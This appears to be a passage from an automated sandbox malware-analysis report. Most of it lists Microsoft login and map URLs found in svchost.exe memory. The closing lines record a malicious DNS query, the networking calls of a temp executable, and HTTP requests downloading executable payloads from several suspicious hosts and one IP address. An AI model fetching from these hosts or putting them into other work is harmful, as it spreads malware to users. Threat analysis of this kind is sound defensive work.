Source: svchost.exe, 0000000A.00000002.626072218.00000159C3038000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.379856179.00000159C302A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.379914727.00000159C3037000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
Source: svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805023t
Source: svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502f
Source: svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502lt
Source: svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281306908.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000000A.00000003.281590314.00000159C2929000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281395324.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281306908.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806010
Source: svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601t
Source: svchost.exe, 0000000A.00000003.281590314.00000159C2929000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296662494.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294147498.00000159C2967000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281377662.00000159C2977000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603f
Source: svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000A.00000003.299886120.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.300081747.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806044
Source: svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604A
Source: svchost.exe, 0000000A.00000003.296662494.00000159C2954000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604anageLo
Source: svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000000A.00000003.281590314.00000159C2929000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295929266.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296662494.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294147498.00000159C2967000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281377662.00000159C2977000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606ests
Source: svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.566259297.00000159C222A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.566259297.00000159C222A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000A.00000002.566259297.00000159C222A000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAh.0
Source: svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srcfg:GetAppDataServicedctcehresholdquests
Source: svchost.exe, 0000000A.00000003.281590314.00000159C2929000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281395324.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281306908.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000A.00000003.295899155.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296794174.00000159C2950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000A.00000002.579083943.00000159C2294000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cplStores
Source: svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296355726.00000159C2980000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295947348.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285004820.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295938252.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296239192.00000159C292E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295780941.00000159C2954000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296096307.00000159C2959000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293955641.00000159C2991000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000A.00000003.295704709.00000159C2950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOUser.sr
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.627142562.00000159C3098000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296769107.00000159C2960000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281480432.00000159C294E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281320599.00000159C293B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281812532.00000159C2969000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.294086522.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.627142562.00000159C3098000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281480432.00000159C294E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295872846.00000159C295F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281320599.00000159C293B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281812532.00000159C2969000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000A.00000003.379856179.00000159C302A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.379914727.00000159C3037000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf2
Source: svchost.exe, 0000000A.00000003.296769107.00000159C2960000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296592771.00000159C295C000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf57
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.626072218.00000159C3038000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281638546.00000159C290E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.379856179.00000159C302A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.572982300.00000159C225B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.379914727.00000159C3037000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srft
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296070984.00000159C30F6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281581078.00000159C294C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.636886402.00000159C30B3000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfmous
Source: svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srft
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.605447423.00000159C2302000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298372199.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.569053801.00000159C2243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297053072.00000159C30C8000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297114349.00000159C30C8000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297762903.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297613677.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297685112.00000159C2949000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297864916.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf.srf
Source: svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf256
Source: svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/resetpw.srfsn#
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298372199.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281662678.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.569053801.00000159C2243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297053072.00000159C30C8000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297114349.00000159C30C8000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/retention.srf6
Source: svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/retention.srfpe
Source: svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000000A.00000003.298092187.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf4
Source: svchost.exe, 0000000A.00000003.303277678.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srfn6
Source: svchost.exe, 0000000A.00000003.303407367.00000159C2949000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srfope
Source: svchost.exe, 0000000A.00000003.307401572.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.307768227.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305381034.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srfpe
Source: svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comUQ
Source: svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comg#
Source: svchost.exe, 0000000A.00000003.293917984.00000159C298C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303531645.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.314357417.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.298372199.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.293896229.00000159C2989000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.281662678.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.295728061.00000159C2948000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.569053801.00000159C2243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.301112460.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.296882891.00000159C30C7000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.638652990.00000159C30C6000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297053072.00000159C30C8000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.297114349.00000159C30C8000.00000004.00000001.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: svchost.exe, 0000000A.00000003.296213720.00000159C2948000.00000004.00000001.sdmp	String found in binary or memory: https://signup.live.com/signup.aspxs#
Source: svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000E.00000002.308630340.000002DD3283D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.308554216.000002DD32813000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000003.308051051.000002DD32856000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000002.308642618.000002DD32842000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308085043.000002DD32841000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.308006712.000002DD32840000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000E.00000002.308663972.000002DD3284D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.307901327.000002DD32847000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown

DNS traffic detected: queries for: host-data-coin-11.com

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HeapCreate,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic	HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
